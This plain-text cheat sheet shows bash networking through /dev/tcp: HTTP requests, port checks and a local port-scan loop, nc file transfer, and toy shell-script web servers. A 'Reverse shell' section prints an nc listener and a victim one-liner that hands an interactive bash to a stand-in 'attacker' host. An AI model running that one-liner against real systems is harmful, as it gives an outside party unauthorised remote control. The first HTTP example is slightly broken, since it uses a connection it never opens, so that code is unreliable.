------------------------------------------------------------------------------- Using TCP/IP networking in Bash https://medium.com/@stefanos.kalandaridis/bash-ing-your-network-f7069ab7c5f4 https://tldp.org/LDP/abs/html/devref1.html https://w0lfram1te.com/exploring-dev-tcp ------------------------------------------------------------------------------- Network Connections (Pure Bash) Bash can open network connections, and even download web pages! Get time (in UTC) cat /dev/tcp/www.example.com/80 # Send request (with carrage returns and newlines) printf >&$web "%s\r\n" "HEAD http://www.example.com/ HTTP/1.0" printf >&$web "\r\n" # read the data returned while read line; do echo $line done <&$web # close exec {web}>&- Bash is port open test (for pods) Note the /dev/null is to make bash quiet about failures timeout 0.5 \ echo -n 2>/dev/null < /dev/tcp/127.0.0.1/7777 && \ echo "open" || echo "closed" What ports are open... for port in {1..8888}; do echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open" done ------------------------------------------------------------------------------- Bash can not do a listen() and accept() You will need to use something like "netcat" or "socat" to this. Or you could use a Bash loadable accept builtin... http://git.savannah.gnu.org/cgit/bash.git/tree/examples/loadables/accept.c This is saved in a directory listed by $BASH_LOADABLES_PATH such as /usr/lib/bash. It is then loaded with: enable accept --- File transfer Bash can not 'listen' on a port (the server side)! As such ONE of the commands below must be a "nc" listener (server-side) That one (the server) must be run first send nc -lvnp 7777 < file.txt # OR cat file.txt > /dev/tcp/receiver/7777 recieve cat < /dev/tcp/sender/7777 > file.txt # OR nc -lvnp 7777 > file.txt Reverse shell Attacker (see "telnet in shell" below) nc -lvnp 80 Victim (with limited capabilities) bash -c 'bash -i >& /dev/tcp/attacker/80 <&1' ------------------------------------------------------------------------------- Telnet in shell Alternative to the attacker "nc" in "Reverse shell" above. Bidirectional with background reader This could be done a lot better, but shows it is posible. =======8<--------CUT HERE---------- # Make connection (variable assignment to $web - bash v4.1) exec {telnet}<>/dev/tcp/www.example.com/80 # backgroud read from server and output while read line; do echo $line; done <&$telnet & reader_pid=$? # send printf >&$telnet "%s\n" "HEAD http://www.example.com/ HTTP/1.0" printf >&$telnet "\n" exec {telnet}>&- kill $reader_pid # precaution =======8<--------CUT HERE---------- ------------------------------------------------------------------------------- Web server shell script. Returning a web page of the word: rock, paper, scissors =======8<--------CUT HERE---------- port=8080 last=0 output=( ROCK PAPER SCISSORS ) while true; do #last=$(( RANDOM%3 )) # random #last=$(( ($last+1)%3 )) # increment last=$(( ($last+2)%3 )) # decrement result=${output[$last]}$'\r\n' printf "HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n%s" \ ${#result} "$result" | nc -l -p $port >/dev/null done =======8<--------CUT HERE---------- WARNING: The above pre-prepares the web page BEFORE the client even connects. Here is an alturnative where we set up a function to handle the request when it is made (looped fork). There is no feedback between called thogh, so no memory of the past as above. =======8<--------CUT HERE---------- # Function to caclulate a result send_web_page() { output=( ROCK PAPER SCISSORS ) result=${output[RANDOM%3]}$'\r\n' printf "HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n%s" \ ${#result} "$result" } # export function to sub-shells... export -f send_web_page # looped forking server, using socat socat tcp-listen:8080,fork exec:'bash -c send_web_page' =======8<--------CUT HERE---------- The next step would be some way of reading th actual request so as to resond to it. That will need a feedback loop, and as such gets into the realm of 'co-processing'. See... https://dev.to/leandronsp/ building-a-web-server-in-bash-part-ii-parsing-http-14kg ------------------------------------------------------------------------------- Other tools nc a cat program for the network ("netcat") tcputils utilities to send/recieve tcp network connetions includes a "getpeername" program. socat A bi-directional relay client (netcat at ends, socat in middle) ssh run commands on another host or forward connections -------------------------------------------------------------------------------